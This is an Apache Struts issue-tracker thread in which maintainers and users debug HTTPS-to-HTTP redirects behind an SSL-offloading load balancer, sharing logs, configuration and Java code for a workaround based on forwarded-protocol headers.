Uploaded image for project: 'Struts 2'
  1. Struts 2
  2. WW-4774

Upgrding Struts 2.3.1 to 2.5.10.1 - Redirect issues HTTPS to HTTP

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Critical
    • Resolution: Fixed
    • Affects Version/s: 2.5.10
    • Fix Version/s: 2.5.12
    • Component/s: None
    • Labels:
      None

      Description

      We are upgrading Struts2 from 2.3.1 to 2.5.10.1 ; redirect making https:// to http:// . The following errors in chrome and IE are seen while redirecting from the popup to main window
      redirecting popup (create user) — main window (viewdashboard) - the URL shows https:// to http://

      We are blocked completely due to this issue and need support ASAP. We also reviewed the apache server configurations and looks good. Please share the fix in detail.

      Error Issue in chrome :
      Mixed Content: The page at 'https://XXXXX/XX/XX/viewdashboard?clear&Id=1&uar=44' was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint 'http://XXX/XX/XX/viewdashboard?uar=44&Id=1'. This request has been blocked; the content must be served over HTTPS.

      Issue in IE
      SEC7127: Redirect was blocked for CORS request.
      File: account
      SCRIPT7002: XMLHttpRequest: Network Error 0x2ef1, Could not complete the operation due to error 00002ef1.

        Issue Links

          Activity

          Hide
          sdutry Stefaan Dutry added a comment -

          Can you please provide some additional information please.

          What tags are on the page that could have created the url?

          From what i can tell you are located on
          https://XXXXX/XX/XX/viewdashboard?clear&Id=1&uar=44
          And somewhere on the page there is a url being used that is:
          http://XXX/XX/XX/viewdashboard?uar=44&Id=1

          Would you have any idea where on the page that url could be located and by what tag it could be rendered?

          You say this happens while being on the "create user" popup and trying to leave it, what happens during the leaving of the popup?

          • is that a link that's being clicked?
            • How is that link built?
            • What tags are used and what attributes are set?
          • is that a form that's being submitted?
            • what tags are used and what attributes are set?
          • how is the popup rendered?
            • is it content from a remote url?
              • is that url https ?
          Show
          sdutry Stefaan Dutry added a comment - Can you please provide some additional information please. What tags are on the page that could have created the url? From what i can tell you are located on https://XXXXX/XX/XX/viewdashboard?clear&Id=1&uar=44 And somewhere on the page there is a url being used that is: http://XXX/XX/XX/viewdashboard?uar=44&Id=1 Would you have any idea where on the page that url could be located and by what tag it could be rendered? You say this happens while being on the "create user" popup and trying to leave it, what happens during the leaving of the popup? is that a link that's being clicked? How is that link built? What tags are used and what attributes are set? is that a form that's being submitted? what tags are used and what attributes are set? how is the popup rendered? is it content from a remote url? is that url https ?
          Hide
          devulapalli upendar added a comment - - edited

          Thank You for looking into the issue.

          1. Logged in the the application built on struts 2 version 2.5.10.1
          2. it takes to dashboard page (main page)
          3. click on add user Button on the main page and then it prompts up popup window to input new user details to be created.
          4. click on submit button on the popup. The request is sent to rest api (running on other instance) and user is persisted in DB successfully then popup gets closed and redirect to main dashboard page to show newly created user details . But the popup still remain showing up and not getting closed even though the new user is created successfully
          5. Errors on chrome and IE developers tool. (Mixed content and CORS)
          6. We dont see any issues with struts 2.3.1.

          below code snippet will help you . The remote url is https

          @SuppressWarnings("serial")
          @Namespace("/account")
          @Results({
          	@Result(name = Views.DASHBOARD, location = "/account/dashboard.tiles", type = TILES),
          	@Result(name = Views.DASHBOARD_REDIRECT, location = "/account/viewdashboard", type = REDIRECT),
          	@Result(name = Views.UPDATE_REDIRECT, location = "/account/updateForm", type = REDIRECT),
          	@Result(name = Views.CREATE, location = "/account/create.tiles", type = Views.Types.TILES),
          	@Result(name = Views.UPDATE, location = "/account/edit.tiles", type = Views.Types.TILES),
          	@Result(name = Views.CREATE_USER, location = "/user/createUser.tiles", type = Views.Types.TILES)
          })
          public class AccountXXX extends AuthXXXome {
          
          @Action("create")
          	public String create() {
          		try {
          			account = restAPI.getUserCreation().create(targetAccount);
          			accountId = account.getId();
          			addActionMessage(getText("account.create.success"));
          
          			return Views.DASHBOARD_REDIRECT;
          		} catch (final RuntimeException e) {
          			processException(e);
          			return Views.CREATE;
          		}
          	}
          }	
          
          Show
          devulapalli upendar added a comment - - edited Thank You for looking into the issue. 1. Logged in the the application built on struts 2 version 2.5.10.1 2. it takes to dashboard page (main page) 3. click on add user Button on the main page and then it prompts up popup window to input new user details to be created. 4. click on submit button on the popup. The request is sent to rest api (running on other instance) and user is persisted in DB successfully then popup gets closed and redirect to main dashboard page to show newly created user details . But the popup still remain showing up and not getting closed even though the new user is created successfully 5. Errors on chrome and IE developers tool. (Mixed content and CORS) 6. We dont see any issues with struts 2.3.1. below code snippet will help you . The remote url is https @SuppressWarnings( "serial" ) @Namespace( "/account" ) @Results({ @Result(name = Views.DASHBOARD, location = "/account/dashboard.tiles" , type = TILES), @Result(name = Views.DASHBOARD_REDIRECT, location = "/account/viewdashboard" , type = REDIRECT), @Result(name = Views.UPDATE_REDIRECT, location = "/account/updateForm" , type = REDIRECT), @Result(name = Views.CREATE, location = "/account/create.tiles" , type = Views.Types.TILES), @Result(name = Views.UPDATE, location = "/account/edit.tiles" , type = Views.Types.TILES), @Result(name = Views.CREATE_USER, location = "/user/createUser.tiles" , type = Views.Types.TILES) }) public class AccountXXX extends AuthXXXome { @Action( "create" ) public String create() { try { account = restAPI.getUserCreation().create(targetAccount); accountId = account.getId(); addActionMessage(getText( "account.create.success" )); return Views.DASHBOARD_REDIRECT; } catch ( final RuntimeException e) { processException(e); return Views.CREATE; } } }
          Hide
          sdutry Stefaan Dutry added a comment -

          Just to make sure:

          so it's this part of the config that causes the scheme to be changed?

          @Result(name = Views.DASHBOARD_REDIRECT, location = "/account/viewdashboard", type = REDIRECT)
          

          Can you also check if the url that's being used to execute the AcountXXX.create action definately is https?

          Show
          sdutry Stefaan Dutry added a comment - Just to make sure: so it's this part of the config that causes the scheme to be changed? @Result(name = Views.DASHBOARD_REDIRECT, location = "/account/viewdashboard" , type = REDIRECT) Can you also check if the url that's being used to execute the AcountXXX.create action definately is https ?
          Hide
          devulapalli upendar added a comment -

          The configuration is
          ELB ---->Apache – ELB – UI Server (Jetty 8.1.4)
          (https) -->http ---http>http — and the SSL is terminated at ELB. The URL in the browser shows HTTPS always when the application is opened in the browser. I believe acccountxxx.create action is HTTPS since on mainwindow we have search page that is working fine and shows HTTPS in chrome developer tools. you can help me how to check to confirm - what code to add to check ?
          Also what class /library code to will change HTTPS to HTTP for redirect url ? I see many users raised questions on struts 2 HTTPS-HTTP but I didnt find any concrete answer for this. could you check and let us know are there any specific migrations steps to be followed for upgrade 2.3.1 to 2.5.10.1 since the same configurations in struts and apache server working fine with 2.3.1 and why not for latest version?are there any specific code involved for this change HTTPS to HTTP?

          is 2.5.10.1 version is stable ?

          Show
          devulapalli upendar added a comment - The configuration is ELB ---->Apache – ELB – UI Server (Jetty 8.1.4) (https) -->http ---http>http — and the SSL is terminated at ELB. The URL in the browser shows HTTPS always when the application is opened in the browser. I believe acccountxxx.create action is HTTPS since on mainwindow we have search page that is working fine and shows HTTPS in chrome developer tools. you can help me how to check to confirm - what code to add to check ? Also what class /library code to will change HTTPS to HTTP for redirect url ? I see many users raised questions on struts 2 HTTPS-HTTP but I didnt find any concrete answer for this. could you check and let us know are there any specific migrations steps to be followed for upgrade 2.3.1 to 2.5.10.1 since the same configurations in struts and apache server working fine with 2.3.1 and why not for latest version?are there any specific code involved for this change HTTPS to HTTP? is 2.5.10.1 version is stable ?
          Hide
          sdutry Stefaan Dutry added a comment -

          is 2.5.10.1 version is stable ?

          Yes, this is the latest stable release.

          I'll try and reproduce the problem by setting up a small application with a form submit that has a REDIRECT result and see if it also switches between http and https.

          What's used internaly is actualy just the HttpServletResponse.encodeRedirectURL

          ServletRedirectResult.java
                  finalLocation = response.encodeRedirectURL(tmpLocation.toString());
          
                  LOG.debug("Redirecting to finalLocation: {}", finalLocation);
          
                  sendRedirect(response, finalLocation);
          
          Show
          sdutry Stefaan Dutry added a comment - is 2.5.10.1 version is stable ? Yes, this is the latest stable release. I'll try and reproduce the problem by setting up a small application with a form submit that has a REDIRECT result and see if it also switches between http and https . What's used internaly is actualy just the HttpServletResponse.encodeRedirectURL ServletRedirectResult.java finalLocation = response.encodeRedirectURL(tmpLocation.toString()); LOG.debug( "Redirecting to finalLocation: {}" , finalLocation); sendRedirect(response, finalLocation);
          Hide
          lukaszlenart Lukasz Lenart added a comment - - edited

          Do you use any other plugin that handles http to https redirection? Struts is protocol agnostic in that area, maybe you have a custom JSP tag? Can you list all the jars?

          Show
          lukaszlenart Lukasz Lenart added a comment - - edited Do you use any other plugin that handles http to https redirection? Struts is protocol agnostic in that area, maybe you have a custom JSP tag? Can you list all the jars?
          Hide
          sdutry Stefaan Dutry added a comment -

          Lukasz Lenart
          I am able to reproduce this issue with a minimal setup.
          It seems that the result of the time "redirect" actualy does result in a http request.

          Clicking the link page with action A results in a redirect result and causes the protocol to become http

          Show
          sdutry Stefaan Dutry added a comment - Lukasz Lenart I am able to reproduce this issue with a minimal setup. It seems that the result of the time "redirect" actualy does result in a http request. github repo: https://github.com/sdutry/WW-4774 running application from github repo: https://polar-mesa-87056.herokuapp.com/ Clicking the link page with action A results in a redirect result and causes the protocol to become http
          Hide
          sdutry Stefaan Dutry added a comment -

          according to the logs:

          11:50:36.502 [qtp2129789493-12] DEBUG org.apache.struts2.result.ServletRedirectResult - Redirecting to finalLocation: /b
          
          • This means that the method sendRedirect still gets a relative URL
          Show
          sdutry Stefaan Dutry added a comment - according to the logs: 11:50:36.502 [qtp2129789493-12] DEBUG org.apache.struts2.result.ServletRedirectResult - Redirecting to finalLocation: /b This means that the method sendRedirect still gets a relative URL
          Hide
          devulapalli upendar added a comment - - edited

          Thanks for reproducing the issue ; I did verify the struts (2.3.32 , not yet checked with version 2.5.20.1)logs and its relative path. Could you please share the solution with code fix as we are completely blocked and investigating the issue for the past 3 days and still investigation going .

          Logs with struts 2.3.32 – I dint check yet 2.5.10.1:
          20 Mar 2017 23:23:24,531 [qtp2122964643-20 - /core/account/create] DEBUG org.apache.struts2.dispatcher.ServletRedirectResult (debug:76) - [/account/viewdashboard] isn't ab
          solute URI, assuming it's a path
          20 Mar 2017 23:23:24,531 [qtp2122964643-20 - /core/account/create] DEBUG org.apache.struts2.dispatcher.ServletRedirectResult (debug:76) - Redirecting to finalLocation
          /core/account/viewdashboard?uar=XXX&accountId=XXXX

          Also just wanted to share the observation, we initially tried upgrade struts version from 2.3.1 to 2.3.32 to resolve CVE-2017-5638 issue .
          With Struts 2.3.32 we found 2 issues 1. redirect issue and 1. CVE-2017-5638 vulnerability are not resolved. Then we upgraded to 2.5.10.1 then this version has redirect issue is still open but no vulnerable. Not sure why 2.3.32 not resolved vulnerability issue.

          Now we are with 2.5.10.1 ,Please help us to fix the redirect issue with 2.5.10.1.

          https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638

          Show
          devulapalli upendar added a comment - - edited Thanks for reproducing the issue ; I did verify the struts (2.3.32 , not yet checked with version 2.5.20.1)logs and its relative path. Could you please share the solution with code fix as we are completely blocked and investigating the issue for the past 3 days and still investigation going . Logs with struts 2.3.32 – I dint check yet 2.5.10.1: 20 Mar 2017 23:23:24,531 [qtp2122964643-20 - /core/account/create] DEBUG org.apache.struts2.dispatcher.ServletRedirectResult (debug:76) - [/account/viewdashboard] isn't ab solute URI, assuming it's a path 20 Mar 2017 23:23:24,531 [qtp2122964643-20 - /core/account/create] DEBUG org.apache.struts2.dispatcher.ServletRedirectResult (debug:76) - Redirecting to finalLocation /core/account/viewdashboard?uar=XXX&accountId=XXXX Also just wanted to share the observation, we initially tried upgrade struts version from 2.3.1 to 2.3.32 to resolve CVE-2017-5638 issue . With Struts 2.3.32 we found 2 issues 1. redirect issue and 1. CVE-2017-5638 vulnerability are not resolved. Then we upgraded to 2.5.10.1 then this version has redirect issue is still open but no vulnerable. Not sure why 2.3.32 not resolved vulnerability issue. Now we are with 2.5.10.1 ,Please help us to fix the redirect issue with 2.5.10.1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
          Hide
          devulapalli upendar added a comment -

          Here are jars we are using

          spring-aop-4.2.4.RELEASE
          spring-aspects-4.2.4.RELEASE
          spring-beans-4.2.4.RELEASE
          spring-context-4.2.4.RELEASE
          spring-context-support-4.2.4.RELEASE
          spring-core-4.2.4.RELEASE
          spring-expression-4.2.2.RELEASE
          spring-security-core-4.0.3.RELEASE
          spring-security-web-4.0.3.RELEASE
          spring-tx-4.2.4.RELEASE
          spring-web-4.2.4.RELEASE
          struts2-convention-plugin-2.3.32
          struts2-core-2.3.32
          struts2-json-plugin-2.3.32
          struts2-spring-plugin-2.3.32
          struts2-core-2.3.32
          struts2-tiles-plugin-2.3.32
          tiles-api-2.2.2
          tiles-core-2.2.2
          tiles-el-2.2.2
          tiles-freemarker-2.2.2
          tiles-jsp-2.2.2
          tiles-ognl-2.2.2
          tiles-servlet-2.2.2
          tiles-template-2.2.2
          wikitext.mediawiki-0.9.4.I20090220-1600-e3x
          wikitext-0.9.4.I20090220-1600-e3x
          wikitext-1.0.1
          xbean-spring-3.7
          xwork-core-2.3.32

          Show
          devulapalli upendar added a comment - Here are jars we are using spring-aop-4.2.4.RELEASE spring-aspects-4.2.4.RELEASE spring-beans-4.2.4.RELEASE spring-context-4.2.4.RELEASE spring-context-support-4.2.4.RELEASE spring-core-4.2.4.RELEASE spring-expression-4.2.2.RELEASE spring-security-core-4.0.3.RELEASE spring-security-web-4.0.3.RELEASE spring-tx-4.2.4.RELEASE spring-web-4.2.4.RELEASE struts2-convention-plugin-2.3.32 struts2-core-2.3.32 struts2-json-plugin-2.3.32 struts2-spring-plugin-2.3.32 struts2-core-2.3.32 struts2-tiles-plugin-2.3.32 tiles-api-2.2.2 tiles-core-2.2.2 tiles-el-2.2.2 tiles-freemarker-2.2.2 tiles-jsp-2.2.2 tiles-ognl-2.2.2 tiles-servlet-2.2.2 tiles-template-2.2.2 wikitext.mediawiki-0.9.4.I20090220-1600-e3x wikitext-0.9.4.I20090220-1600-e3x wikitext-1.0.1 xbean-spring-3.7 xwork-core-2.3.32
          Hide
          sdutry Stefaan Dutry added a comment -

          Lukasz Lenart

          The only way i can see to fix this is the following:

          • make a complete URL, including the scheme, to use for the request.sendRedirect()
          • if the X-Forwarded-Proto header is present, use that as scheme
          • if the X-Forwarded-Proto header is not present, use request.getScheme()
          Show
          sdutry Stefaan Dutry added a comment - Lukasz Lenart The only way i can see to fix this is the following: make a complete URL, including the scheme, to use for the request.sendRedirect() if the X-Forwarded-Proto header is present, use that as scheme if the X-Forwarded-Proto header is not present, use request.getScheme()
          Hide
          devulapalli upendar added a comment -

          when I debugged request.getScheme() method is returning http, we thought of overriding it with https but we didnt find a simple way yet, will check X-Forwardd-Proto is present or not We though of setting this header at apache server side but I heard setting this header will cause security related issues but not sure ?

          is there a bug in version 2.5.10.1 ? why this causing HTTPS to HTTP ? its working fin with 2.3.1 version ? what could be the rootcause with latest versions (2.3.32 or 2.5.10.1)

          Are there any plugins available to resolve this issue ?

          Show
          devulapalli upendar added a comment - when I debugged request.getScheme() method is returning http, we thought of overriding it with https but we didnt find a simple way yet, will check X-Forwardd-Proto is present or not We though of setting this header at apache server side but I heard setting this header will cause security related issues but not sure ? is there a bug in version 2.5.10.1 ? why this causing HTTPS to HTTP ? its working fin with 2.3.1 version ? what could be the rootcause with latest versions (2.3.32 or 2.5.10.1) Are there any plugins available to resolve this issue ?
          Hide
          devulapalli upendar added a comment - - edited

          I added in apache server but it didnt work , here is snippet

          <VirtualHost *:XXX>
          LogLevel warn
          RequestHeader set X-Forwarded-Proto "https"
          ServerName XXXXX
          RewriteEngine on
          RewriteLog /var/log/httpd/rewrite.log
          RewriteLogLevel 3

          1. RewriteCond % {HTTPS}

            !=on
            RewriteCond %

            {HTTP:X-Forwarded-Proto}

            !https [NC]
            RewriteRule ^ https://%

            {HTTP_HOST}%{REQUEST_URI} [L,R=301,NE]
            #RewriteCond %{HTTP_HOST}

            !^XXXXXX$ [NC]
            #RewriteRule ^(.*)$ http://XXXXXXX$1 [R,L,NE]

          RewriteRule ^/XXX/XXForm(.*)$ /XX/XX/xxxnForm$1 [R,L,NE]

          RewriteCond %

          {REQUEST_METHOD}

          !^GET$ [NC]
          RewriteCond %

          {SCRIPT_FILENAME}

          ^/asset [NC]
          RewriteRule .* - [F,NE]

          RewriteCond %

          {QUERY_STRING}

          ^(.)internal(=[^&]+)?&?(.)?$
          RewriteRule ^(.*)$ $1?%1%3 [L,R=301,NE]

          Show
          devulapalli upendar added a comment - - edited I added in apache server but it didnt work , here is snippet <VirtualHost *:XXX> LogLevel warn RequestHeader set X-Forwarded-Proto "https" ServerName XXXXX RewriteEngine on RewriteLog /var/log/httpd/rewrite.log RewriteLogLevel 3 RewriteCond % {HTTPS} !=on RewriteCond % {HTTP:X-Forwarded-Proto} !https [NC] RewriteRule ^ https://% {HTTP_HOST}%{REQUEST_URI} [L,R=301,NE] #RewriteCond %{HTTP_HOST} !^XXXXXX$ [NC] #RewriteRule ^(.*)$ http://XXXXXXX$1 [R,L,NE] RewriteRule ^/XXX/XXForm(.*)$ /XX/XX/xxxnForm$1 [R,L,NE] RewriteCond % {REQUEST_METHOD} !^GET$ [NC] RewriteCond % {SCRIPT_FILENAME} ^/asset [NC] RewriteRule .* - [F,NE] RewriteCond % {QUERY_STRING} ^(. )internal(= [^&] +)?&?(. )?$ RewriteRule ^(.*)$ $1?%1%3 [L,R=301,NE]
          Hide
          sdutry Stefaan Dutry added a comment -

          upendar
          I don't think you'll be able to fix it with any Proxy in between your server.
          The problem being that the redirect happens on your webserver, which just sends a 302 status with a location header pointing to the desired URL.
          This response is interpreted by the browser which just reads the location header to determine what URL to call.

          The comment i made was for an adjustment inside the ServletRedirectResult.java code (part of the struts framework).

          Show
          sdutry Stefaan Dutry added a comment - upendar I don't think you'll be able to fix it with any Proxy in between your server. The problem being that the redirect happens on your webserver, which just sends a 302 status with a location header pointing to the desired URL. This response is interpreted by the browser which just reads the location header to determine what URL to call. The comment i made was for an adjustment inside the ServletRedirectResult.java code (part of the struts framework).
          Hide
          devulapalli upendar added a comment -

          Stefaan Dutry , sorry unable to follow, could you help me what we need to do to resolve the issue ? do you confirm is this not an issue with struts version ? if so then how its working with lower version 2.3.1 ? pls help with fix to resolve the issue.

          Show
          devulapalli upendar added a comment - Stefaan Dutry , sorry unable to follow, could you help me what we need to do to resolve the issue ? do you confirm is this not an issue with struts version ? if so then how its working with lower version 2.3.1 ? pls help with fix to resolve the issue.
          Hide
          lukaszlenart Lukasz Lenart added a comment -

          upendar what do you mean that the Struts 2.3.32 didn't resolve CVE-2017-5638? Please send any details to security@struts.apache.org

          Show
          lukaszlenart Lukasz Lenart added a comment - upendar what do you mean that the Struts 2.3.32 didn't resolve CVE-2017-5638? Please send any details to security@struts.apache.org
          Hide
          sdutry Stefaan Dutry added a comment -

          upendar
          What i've found so far:

          Is this issue caused by struts?
          No, it's not exactly caused by struts. The problem is caused by the fact that the sendRedirect method from HttpServletResponse doesn't take https offloading into account.
          Can this issue be prevented by a change inside struts?
          It probably can be fixed by a change in struts.
          Can this issue be fixed on your side?
          Unfortunately i don't know the capabilities of ELB. Chances are that it's powerful enough to do this. It would require to change the Location response header when there is one. This is not the correct location for this fix.
          How is this working with version 2.3.1?
          No idea, i don't see any notable change concerning how the redirect is performed.

          Currently i'm still looking into finding a fix for this.

          Show
          sdutry Stefaan Dutry added a comment - upendar What i've found so far: Is this issue caused by struts? No, it's not exactly caused by struts. The problem is caused by the fact that the sendRedirect method from HttpServletResponse doesn't take https offloading into account. Can this issue be prevented by a change inside struts? It probably can be fixed by a change in struts. Can this issue be fixed on your side? Unfortunately i don't know the capabilities of ELB . Chances are that it's powerful enough to do this. It would require to change the Location response header when there is one. This is not the correct location for this fix. How is this working with version 2.3.1 ? No idea, i don't see any notable change concerning how the redirect is performed. Currently i'm still looking into finding a fix for this.
          Hide
          sdutry Stefaan Dutry added a comment -

          Lukasz Lenart
          I've tried making a complete url using buildUrl method of the urlHelper .

          Somehow when i do that, the complete url no longer contains the port number when running localy (localhost:8080 (maven-jetty-plugin)), causing them to no longer work.

          Am i missing something here?

          Show
          sdutry Stefaan Dutry added a comment - Lukasz Lenart I've tried making a complete url using buildUrl method of the urlHelper . Somehow when i do that, the complete url no longer contains the port number when running localy (localhost:8080 (maven-jetty-plugin)), causing them to no longer work. Am i missing something here?
          Hide
          devulapalli upendar added a comment - - edited

          we use below jars; there are still few more jars being used in the application , I dint list all of them what we use in the application.

          if you could let us know what changed to be done at struts that would be really good. As you said you were able to replicate the issue right ?there is no change in servelet api and sendRedirect() is being called in struts org.apache.struts2.dispatcher.ServletRedirectResult class and finallocation is relativepath, as you stated, eventually the servletresponse will construct the entire url .

          jetty-servlet-8.1.4.v20120524.jar
          javax.servlet-3.0.0.v201112011016.jar
          javax.servlet.jsp.jstl-1.2.0.v201105211821.jar
          javax.servlet.jsp-2.2.0.v201112011158.jar
          tiles-servlet-3.0.7.jar
          tiles-request-servlet-1.0.6.jar

          Show
          devulapalli upendar added a comment - - edited we use below jars; there are still few more jars being used in the application , I dint list all of them what we use in the application. if you could let us know what changed to be done at struts that would be really good. As you said you were able to replicate the issue right ?there is no change in servelet api and sendRedirect() is being called in struts org.apache.struts2.dispatcher.ServletRedirectResult class and finallocation is relativepath, as you stated, eventually the servletresponse will construct the entire url . jetty-servlet-8.1.4.v20120524.jar javax.servlet-3.0.0.v201112011016.jar javax.servlet.jsp.jstl-1.2.0.v201105211821.jar javax.servlet.jsp-2.2.0.v201112011158.jar tiles-servlet-3.0.7.jar tiles-request-servlet-1.0.6.jar
          Hide
          lukaszlenart Lukasz Lenart added a comment -

          Stefaan Dutry can you try to use redirectAction instead of redirect in your example?

          upendar please share why 2.3.32 didn't resolve the vulnerability for you, it's important.

          Show
          lukaszlenart Lukasz Lenart added a comment - Stefaan Dutry can you try to use redirectAction instead of redirect in your example? upendar please share why 2.3.32 didn't resolve the vulnerability for you, it's important.
          Hide
          sdutry Stefaan Dutry added a comment -

          Lukasz Lenart

          I tried with redirectAction.
          It also results in switching to http.

          But from what i see, redirectAction just extends from redirect, so it would be weird if they behaved differently.

          see: https://polar-mesa-87056.herokuapp.com/

          Show
          sdutry Stefaan Dutry added a comment - Lukasz Lenart I tried with redirectAction. It also results in switching to http . But from what i see, redirectAction just extends from redirect, so it would be weird if they behaved differently. see: https://polar-mesa-87056.herokuapp.com/
          Hide
          lukaszlenart Lukasz Lenart added a comment -

          Yeah, I know but I wanted understand what's going on. I have a project that uses https and actionRedirect and it works without problems. So this is mainly an issue with using ELB/Proxy/etc? Not really related to Struts itself? Because as far I understand, it's a servlet's responsibility to translate a relative path into the full url.

          the servlet container must convert the relative URL to an absolute URL before sending the response to the client.
          http://docs.oracle.com/javaee/6/api/javax/servlet/http/HttpServletResponse.html#sendRedirect(java.lang.String)

          Show
          lukaszlenart Lukasz Lenart added a comment - Yeah, I know but I wanted understand what's going on. I have a project that uses https and actionRedirect and it works without problems. So this is mainly an issue with using ELB/Proxy/etc? Not really related to Struts itself? Because as far I understand, it's a servlet's responsibility to translate a relative path into the full url. the servlet container must convert the relative URL to an absolute URL before sending the response to the client. http://docs.oracle.com/javaee/6/api/javax/servlet/http/HttpServletResponse.html#sendRedirect(java.lang.String )
          Hide
          sdutry Stefaan Dutry added a comment -

          Lukasz Lenart
          I have to agree and disagree at the same time.

          Not really related to Struts itself?
          Indeed, not realy a struts issue
          So this is mainly an issue with using ELB/Proxy/etc
          Not realy, they are setting the correct X-Forwarded-Proto which should indicate what the protocol was
          the servlet container must convert the relative URL to an absolute URL before sending the response to the client.
          It's basicaly the implementation of the HttpServletResponse that's not handling it correctly.

          I was only thinking about a workaround where we provided the full url to send it to the sendRedirect method

          Show
          sdutry Stefaan Dutry added a comment - Lukasz Lenart I have to agree and disagree at the same time. Not really related to Struts itself? Indeed, not realy a struts issue So this is mainly an issue with using ELB/Proxy/etc Not realy, they are setting the correct X-Forwarded-Proto which should indicate what the protocol was the servlet container must convert the relative URL to an absolute URL before sending the response to the client. It's basicaly the implementation of the HttpServletResponse that's not handling it correctly. I was only thinking about a workaround where we provided the full url to send it to the sendRedirect method
          Hide
          lukaszlenart Lukasz Lenart added a comment -

          ... but if this worked correctly with previous version of Struts I assume that they have had a proper configuration that matches the old version and probably that's the case - it doesn't fit the new version, maybe the WAR name changed, or they have overlooked a container configuration (i.e. context.xml inside an old project, etc).

          Show
          lukaszlenart Lukasz Lenart added a comment - ... but if this worked correctly with previous version of Struts I assume that they have had a proper configuration that matches the old version and probably that's the case - it doesn't fit the new version, maybe the WAR name changed, or they have overlooked a container configuration (i.e. context.xml inside an old project, etc).
          Hide
          Charu_R Charu Ramchandani added a comment -

          Hi,
          I am part of Upendar's team, working on this issue.

          Just have this doubt, if Spring Security could be playing around here. As with Struts 2.3.1 version, we were using Spring 3.0.5.RELEASE version.

          Show
          Charu_R Charu Ramchandani added a comment - Hi, I am part of Upendar's team, working on this issue. Just have this doubt, if Spring Security could be playing around here. As with Struts 2.3.1 version, we were using Spring 3.0.5.RELEASE version.
          Hide
          sdutry Stefaan Dutry added a comment -

          Lukasz Lenart
          I had had a meeting with our system administrator at work to discuss this topic.

          In case of a tomcat server the solution would have been to add a separate connector (on a different port) and set the scheme to https. Then making sure that this connector gets used when a request originating from https is called.
          This way if a call to getScheme() happens, it will result in https.

          example from tomcat site
          <!-- Define a SSL Coyote HTTP/1.1 Connector on port 8443 -->
          <Connector
                     protocol="org.apache.coyote.http11.Http11AprProtocol"
                     port="8443" maxThreads="200"
                     scheme="https" secure="true" SSLEnabled="true"
                     SSLCertificateFile="/usr/local/ssl/server.crt"
                     SSLCertificateKeyFile="/usr/local/ssl/server.pem"
                     SSLVerifyClient="optional" SSLProtocol="TLSv1+TLSv1.1+TLSv1.2"/>
          

          Although this solution is possible when you are having full control over the application server (and it's configuration) it's deployed on, i can imagine plenty of cases where that's not the case.

          Should i try to create 2 extra seperate resultTypes for people where the previous is not an option?
          for example:

          • SSLAwareServletRedirectResult
          • SSLAwareServletActionRedirectResult
          Show
          sdutry Stefaan Dutry added a comment - Lukasz Lenart I had had a meeting with our system administrator at work to discuss this topic. In case of a tomcat server the solution would have been to add a separate connector (on a different port) and set the scheme to https . Then making sure that this connector gets used when a request originating from https is called. This way if a call to getScheme() happens, it will result in https. example from tomcat site <!-- Define a SSL Coyote HTTP/1.1 Connector on port 8443 --> <Connector protocol= "org.apache.coyote.http11.Http11AprProtocol" port= "8443" maxThreads= "200" scheme= "https" secure= "true" SSLEnabled= "true" SSLCertificateFile= "/usr/local/ssl/server.crt" SSLCertificateKeyFile= "/usr/local/ssl/server.pem" SSLVerifyClient= "optional" SSLProtocol= "TLSv1+TLSv1.1+TLSv1.2" /> Although this solution is possible when you are having full control over the application server (and it's configuration) it's deployed on, i can imagine plenty of cases where that's not the case. Should i try to create 2 extra seperate resultTypes for people where the previous is not an option? for example: SSLAwareServletRedirectResult SSLAwareServletActionRedirectResult
          Hide
          lukaszlenart Lukasz Lenart added a comment -

          You can try if this isn't overcomplicated, we can include those results in struts-extras

          Show
          lukaszlenart Lukasz Lenart added a comment - You can try if this isn't overcomplicated, we can include those results in struts-extras
          Hide
          devulapalli upendar added a comment -

          Any update on this please ?

          Show
          devulapalli upendar added a comment - Any update on this please ?
          Hide
          sdutry Stefaan Dutry added a comment -

          upendar
          Maybe you can check this post out for a fix.

          http://www.exampit.com/blog/javahunter/5-8-2016-Why-does-https-become-http-on-a-sendredirect

          This involves the following steps:

          • Creating a HttpServletResponseWrapper implementation
            • override sendRedirect
            • change the url in the way needed on the condition for your situation, be it by interpreting the Forwarded header (RFC7239) or the X-Forwarded-Proto header or another custom header your https offloader specifies.
          • Creating a filter that uses the newly defined HttpServletResponseWrapper
          • use the filter in your web-application
          Show
          sdutry Stefaan Dutry added a comment - upendar Maybe you can check this post out for a fix. http://www.exampit.com/blog/javahunter/5-8-2016-Why-does-https-become-http-on-a-sendredirect This involves the following steps: Creating a HttpServletResponseWrapper implementation override sendRedirect change the url in the way needed on the condition for your situation, be it by interpreting the Forwarded header ( RFC7239 ) or the X-Forwarded-Proto header or another custom header your https offloader specifies. Creating a filter that uses the newly defined HttpServletResponseWrapper use the filter in your web-application
          Hide
          Charu_R Charu Ramchandani added a comment -

          Another point to add here is that we have a custom Interceptor which inherits from MessageStoreInterceptor class, and wherein we are registering a custom PreResultListener before invoking super.intercept(), i.e.,

          MyCustomInterceptor.java
          // Some comments here 
          @Override 
          public String intercept(ActionInvocation invocation) throws Exception { 
          { 
              invocation.addPreResultListener(new MyCustomPreResultListener()); 
              return super.intercept(); 
          } 
          

          and here is the listener

          MyCustomPreResultListener.java
          // Some comments here 
          @Override 
          public String intercept(ActionInvocation invocation) throws Exception { 
          { 
              invocation.addPreResultListener(new MyCustomPreResultListener()); 
              return super.intercept(); 
          } 
          

          and

          MyCustomPreResultListener.java
          @Override
          	public void beforeResult(ActionInvocation invocation, String resultCode) {
          		// If in a page fragment
          		if (!Strings.isNullOrEmpty(resultCode) && invocation instanceof DefaultActionInvocation && invocation.getAction() instanceof BaseAction) {
          			try {
          				final DefaultActionInvocation dai = (DefaultActionInvocation) invocation;
          				final MyBaseAction act = (MyBaseAction) invocation.getAction();
          				// Instantiate result
          				final Result res = dai.createResult();
          
          				if (action.inFragment() && res != null && res instanceof ServletRedirectResult) {
          					final ServletRedirectResult servletRedirectResult = (ServletRedirectResult) res;
          					redirectToPage(invocation, servletRedirectResult.getLocation(), getAnchorFromRedirect(servletRedirectResult), action);
          				}
          			} catch (Exception e) {
          				e.printStackTrace();
          			}
          		}
          	}
          getAnchorFromRedirect // uses reflections to read the value of anchor from ServletRedirectResult object, which is coming as null
          public static void redirectToPage(ActionInvocation invocation, String url, String anchor, MyBaseAction action, ServletRedirectResult res) throws Exception {
          		final HttpServletRequest req = ServletActionContext.getRequest();
          		res.setStatusCode(204);
